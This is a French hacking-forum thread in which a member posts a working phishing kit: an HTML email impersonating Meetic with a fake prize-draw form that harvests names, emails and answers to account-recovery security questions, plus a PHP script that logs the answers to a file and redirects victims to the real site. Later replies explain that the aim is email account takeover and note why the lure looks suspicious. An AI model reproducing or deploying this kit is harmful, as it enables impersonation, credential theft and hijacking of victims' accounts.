Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 09-10-2009 22:52:09

ccmp
Membre Indétronable
Inscription : 06-11-2008
Messages : 177

phishing par mail

Bonsoir

dans le seul but d'apprendre en m'amusant j'ai donc codé deux trois page web sympa

le but du mail est de faire croire que meetic vous invite a un jeu par tirage au sort en remplissant un formulaire inclus dans le mail et d'envoyer les réponse et d'attendre le tirage au sort

voici le mail

<HEAD> <title>bienvenue sur le jeu meetic</title>
<style type="text/css">
DIV.centered { text-align: justify }
fieldset { background-color: #FFFFAA;}
</style>
</HEAD>
<body>
<h4>Grand jeu meetic 1ans d'abonnement offert<br>
par tirage au sort</h4>
<p><a href="http://******" title="reglement officiel" >jeu gratuit sans obligation d'achat</a></p><br>
<a class="mtcLink1A" target="_blank" title="MeeticAffinity : Test d'affinités - Coaching - Conseils. Cliquez ici !" href="http://www.meeticaffinity.fr/signup/landing_g.php?mtcmk=500102">MeeticAffinity : Test d'affinités - Coaching - Conseils. Cliquez ici !</a><br />
<div class="justify"><fieldset>
<legend>Vos coordonnées</legend>
<form action="http://******.php" method="get">

<tr>
  <td>Quel est votre nom ?</td><br />
  <td><input type="text" name="nom" /></td><br />
</tr>
<tr>
  <td>Quel est votre prénom ?</td><br />
  <td><input type="text" name="prenom" /></td><br />
</tr>
<tr>
  <td>Age ?</td><br />
  <td><input type="text" name="age" /></td><br />
</tr>
  <td>Adresse email ?</td><br />
  <td><input type="text" name="email" /></td><br />
</tr>
<tr>
  <td>Profession de votre grand-père ?</td><br />
  <td><input type="text" name="professionpp" /></td><br />
</tr>
<tr>
  <td>Lieu de naissance de votre mère ?</td><br />
  <td><input type="text" name="lieumama" /></td><br />
</tr>
<tr>
  <td>Le nom de votre restaurant préféré ?</td><br />
  <td><input type="text" name="cbnjv" /></td><br />
</tr>
<tr>
  <td>Nom de mon premier animal domestique ? </td><br />
  <td><input type="text" name="d&h" /></td><br />
</tr>
<tr>
  <td>Prenom de votre meilleur ami d'enfance ?</td><br />
  <td><input type="text" name="ami" /></td><br />
</tr>
<tr>
  <td>Votre professeur préféré ?</td><br />
  <td><input type="text" name="prof" /></td><br />
</tr>
<tr>
  <td>Personnage historique préféré ?</td><br />
  <td><input type="text" name="phisto" /></td><br />
</tr>

 <p><input type="checkbox" name="validation" value="valeur"  /> <a href="http://****" title="reglement officiel" >J'accepte le reglement</a></p><br />
<p>
<input type="submit" name="validation" value="Envoyer"  /> 
   </p>
</form>
</fieldset>
</div> 
</body>

le code php  viens d'un super script je l'ai adapter a mes besoins [source----->ici

<?php
$br = "\r\n";
$add = '-----------------------------' . $br . 
'Nom : ' . $_GET['nom'] . $br . 
'-------------' . $br .
'Prénom : ' . $_GET['prenom'] . $br .
'-------------' . $br .
'Age : ' . $_GET['age'] . $br .
'-------------' . $br .
'Adresse email : ' . $_GET['email'] . $br .
'-------------' . $br .
'Profession de votre grand-père : ' . $_GET['professionpp'] . $br .
'-------------' . $br .
'Lieu de naissance de votre mère : ' . $_GET['lieumama'] . $br .
'-------------' . $br .
'Le nom de votre restaurant préféré : ' . $_GET['cbnjv'] . $br .
'-------------' . $br .
'Nom de mon premier animal domestique : ' . $_GET['d&h'] . $br .
'-------------' . $br .
'Prenom de votre meilleur ami denfance : ' . $_GET['ami'] . $br .
'-------------' . $br .
'Votre professeur préféré : ' . $_GET['prof'] . $br .
'-------------' . $br .
'Personnage historique préféré : ' . $_GET['phisto'] . $br .

///////////////////////////////
'-----------------------------' .$br.$br.$br.$br;
$new = $_POST['nom'];
$oo = fopen('form.adm', 'a+'); //form.adm les donnees de l'inscription du formulaire seront enregistrez dedans !

fseek($oo, 0);
fputs($oo, $add);

fclose($oo);
?>
<script>
location.replace("http://www.meetic.fr/signup/landing_g.php?mtcmk=004993&mtsid=91007123546038011&tckka=91007123546038011&gclid=CPD94Mbeqp0CFVITzAodrDh_7Q");
</script>

voilà je vous donne pas la raison des questions 
voyons si vous trouver a quoi peut servir ce phishing  wink

cordialement

Dernière modification par ccmp (09-10-2009 23:21:47)

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 09-10-2009 23:04:47

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 354

Re : phishing par mail

A récupérer les comptes emails grace aux "questions secrètes"...

Par contre le link de ta source est une 404.

Hors Ligne

#3 09-10-2009 23:13:15

ccmp
Membre Indétronable
Inscription : 06-11-2008
Messages : 177

Re : phishing par mail

arf t trop fort ben moi j'avoue que c le genre de truc ou je pourrais me faire avoir mais je suis tellement parano wink

Hors Ligne

#4 09-10-2009 23:29:26

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 354

Re : phishing par mail

En effet, pour des personnes qui ne comprennent pas grand chose en sécurité informatique c'est typiquement le genre d'attaque qui peut donner des résultats.

Maintenant, pour une personne avertie il est évident que l'objet de ta page est tout simplement de récupérer des informations afin de hacker l'acompte email... Plusieurs problèmes se posent:

-Le mail risque d'etre dégagé par les filtres anti spams avant meme d'avoir été lu
-La source du mail montrera qu'il ne provient pas de chez Meetic
-Le destinataire n'est pas forcément inscrit chez Meetic, il va peut etre se poser des questions
-Le questionnaire est un peu trop clairement destiné à récupérer des informations, c'est franchement suspect
-Meetic qui offre un an d'abonnement? Là aussi ça sent l'embrouille...

Enfin cela illustre en tout cas très bien la dangerosité du phishing, si ce type de page est visualisé par des milliers de personnes, bien évidemment dans le lot il y en aura toujours qui vont y croire, c'est la raison pour laquelle les attaques par phishing ont autant de succès, meme si ça peut paraitre énorme sur plusieurs milliers de spams il y aura du résultat.

Hors Ligne

#5 09-10-2009 23:59:33

ccmp
Membre Indétronable
Inscription : 06-11-2008
Messages : 177

Re : phishing par mail

oui c une belle illustration

je m'eclate plus a faire les truc que de les exploiter

il y a une nouvelle sorte de phishing il sagit des iframes transparente bien fait c difficilement détectable et pourtant vous êtes bien sur le site officiel ...

enfin la prudence est de mise wink

Hors Ligne

#6 10-10-2009 00:02:16

SbZ
Membre V.I.P.
Lieu : ~
Inscription : 01-03-2009
Messages : 272

Re : phishing par mail

Je trouverai quand même bizare que meetic me demande la profession de mon grand père lol

Hors Ligne

#7 10-10-2009 01:24:07

ccmp
Membre Indétronable
Inscription : 06-11-2008
Messages : 177

Re : phishing par mail

oui c gros mais ça reflète bien les possibilités du phishing car je n'ai pas pousser le truc bien loin pour l'exemple

poussons jusqu'a la page du réglement pour rire
Me Mifroisse règlement du jeu 

wink

Hors Ligne

#8 10-10-2009 07:48:11

Craug
Membre Irremplaçable
Lieu : pas loin du pc
Inscription : 29-04-2009
Messages : 2 130

Re : phishing par mail

En faite le but se n'est pas de demander la mail avec le passe qui vas avec, mais simplement de demander le mail avec toute les question secrete qui peuvent en decouler non?
je pensais le pishing c'etait le moyen d'arriver au fait de demander a la victime de rentrer son adresse et son mot de passe^^


[img align=c]http://ups.imagup.com/06/1263162311.gif[/img]
Linksys wusb54gc, AWUS036H, xp et ubuntu en dual boot, live cd de BT 3 fusion, Crack wep, Anec cookie editor
Craug Pour Crack-WPA Quand Chuck Norris utilise Windows, il ne plante pas.

Hors Ligne

#9 10-10-2009 10:17:32

ccmp
Membre Indétronable
Inscription : 06-11-2008
Messages : 177

Re : phishing par mail

craug a écrit :

je pensais le pishing c'etait le moyen d'arriver au fait de demander a la victime de rentrer son adresse et son mot de passe^^

oui et non le but c d'avoir les infos qui t'intéresse là pour l'exemple on part sur meetic mais le final c les questions secrete ...

Hors Ligne

#10 10-10-2009 10:52:33

Craug
Membre Irremplaçable
Lieu : pas loin du pc
Inscription : 29-04-2009
Messages : 2 130

Re : phishing par mail

oui avoir les pass c'est ce que je pensais mais j'avais absolument pas pensé aux question secrete, je me disais c'est gros qd meme un mail qui te demande mail+ passe et y a des neuneu qui tombent dedans hmm mais si c'est avec les question secrete c'est plus sournois plus discret donc plus de chance de reussite


[img align=c]http://ups.imagup.com/06/1263162311.gif[/img]
Linksys wusb54gc, AWUS036H, xp et ubuntu en dual boot, live cd de BT 3 fusion, Crack wep, Anec cookie editor
Craug Pour Crack-WPA Quand Chuck Norris utilise Windows, il ne plante pas.

Hors Ligne

#11 14-02-2010 00:17:15

Veidam
Membre Indispensable
Lieu : us
Inscription : 11-02-2010
Messages : 530

Re : phishing par mail

bon exemple !!!

oui j'ai appris moi aussi a ne jamais mettre une vérité dans les réponses secrète ....

Dernière modification par Veidam (14-02-2010 00:17:56)

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Sujets similaires

Discussion Réponses Vues Dernier message
Creation E-mail Gmail.be par regard48  [ 1 2 ]
29 1058 13-07-2016 22:08:10 par kcdtv
1 925 06-09-2015 12:23:56 par pparent
EVIL TWIN phishing par snooper91
13 4455 29-10-2013 11:16:23 par donjuandemarco
0 1048 14-10-2013 17:36:44 par Benzilla
0 1318 01-07-2013 15:04:51 par M1ck3y

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.029 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]